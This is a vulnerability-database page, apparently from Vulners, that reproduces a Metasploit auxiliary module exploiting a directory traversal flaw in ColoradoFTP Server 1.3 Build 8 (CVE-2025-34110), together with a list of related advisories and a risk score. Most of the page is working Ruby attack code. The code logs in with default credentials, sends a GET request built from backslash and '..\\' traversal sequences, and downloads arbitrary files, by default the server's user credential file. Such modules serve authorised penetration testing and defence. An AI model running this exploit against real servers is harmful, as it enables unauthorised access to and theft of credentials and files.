ColoradoFTP Server 1.3 Build 8 Directory Traversal Information Disclosure
🗓️ 11 Aug 2016 00:00:00Reported by h00die <[email protected]>, RvLaboratoryType
metasploit🔗 www.rapid7.com👁 46 Views
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| CVE-2025-34110 | 29 May 201815:50 | – | circl | |
| ColoradoFTP Server 安全漏洞 | 15 Jul 202500:00 | – | cnnvd | |
| CVE-2025-34110 | 15 Jul 202513:01 | – | cve | |
| CVE-2025-34110 ColoradoFTP Server <= 1.3 Build 8 Path Traversal Information Disclosure | 15 Jul 202513:01 | – | cvelist | |
| EUVD-2025-21436 | 3 Oct 202520:07 | – | euvd | |
| CVE-2025-34110 | 15 Jul 202513:15 | – | nvd | |
| ColoradoFTP Server <= 1.3 Directory Traversal Vulnerability - Active Check | 17 Aug 201600:00 | – | openvas | |
| PT-2025-29552 · Unknown · Coloradoftp Server | 15 Jul 202500:00 | – | ptsecurity | |
| CVE-2025-34110 | 17 Jul 202513:57 | – | redhatcve | |
| CVE-2025-34110 ColoradoFTP Server <= 1.3 Build 8 Path Traversal Information Disclosure | 15 Jul 202513:01 | – | vulnrichment |
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Ftp
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize(info = {})
super(
update_info(
info,
'Name' => 'ColoradoFTP Server 1.3 Build 8 Directory Traversal Information Disclosure',
'Description' => %q{
This module exploits a directory traversal vulnerability found in ColoradoFTP server
version <= 1.3 Build 8. This vulnerability allows an attacker to download and upload arbitrary files
from the server GET/PUT command including file system traversal strings starting with '\'.
The server is written in Java and therefore platform independent, however this vulnerability is only
exploitable on the Windows version.
},
'Platform' => 'win',
'Author' => [
'h00die <[email protected]>',
'RvLaboratory', # discovery
],
'License' => MSF_LICENSE,
'References' => [
[ 'CVE', '2025-34110' ],
[ 'EDB', '40231'],
[ 'URL', 'https://bitbucket.org/nolife/coloradoftp/commits/16a60c4a74ef477cd8c16ca82442eaab2fbe8c86'],
[ 'URL', 'https://bugtraq.securityfocus.com/archive/1/539186']
],
'DisclosureDate' => '2016-08-11',
'Notes' => {
'Reliability' => UNKNOWN_RELIABILITY,
'Stability' => UNKNOWN_STABILITY,
'SideEffects' => UNKNOWN_SIDE_EFFECTS
}
)
)
register_options(
[
OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 2 ]),
OptString.new('PATH', [ true, 'Path to the file to disclose, relative to the root dir.', 'conf\\xml-users.xml']),
OptString.new('FTPUSER', [ true, 'Username to use for login', 'ftpuser'], fallbacks: ['USERNAME']), # override default
OptString.new('FTPPASS', [ true, 'Password to use for login', 'ftpuser123'], fallbacks: ['PASSWORD']) # override default
]
)
end
def check_host(ip)
begin
connect
if /Welcome to ColoradoFTP - the open source FTP server \(www\.coldcore\.com\)/i === banner
return Exploit::CheckCode::Detected('ColoradoFTP server detected')
end
ensure
disconnect
end
Exploit::CheckCode::Safe('Target is not running ColoradoFTP')
end
def run_host(ip)
begin
connect_login
file_path = datastore['PATH']
file = ::File.basename(file_path)
# make RETR request and store server response message...
retr_cmd = '\\\\\\' + ("..\\" * datastore['DEPTH']) + "#{file_path}"
res = send_cmd_data(['get', retr_cmd], '')
unless res.nil?
print_status(res[0])
response_data = res[1]
else
print_error("#{file} not found or invalid login")
return
end
if response_data.length == 0
print_status("File (#{file_path})from #{peer} is empty...")
return
end
# store file data to loot
loot_file = store_loot("coloradoftp.ftp.data", "text", rhost, response_data, file, file_path)
vprint_status("Data returned:\n")
vprint_line(response_data)
print_good("Stored #{file_path} to #{loot_file}")
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e
vprint_error(e.message)
elog(e)
rescue ::Timeout::Error, ::Errno::EPIPE => e
vprint_error(e.message)
elog(e)
ensure
data_disconnect
disconnect
end
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 Aug 2016 00:00Current
5.6Medium risk
Vulners AI Score5.6
CVSS 49.3
EPSS0.013
SSVC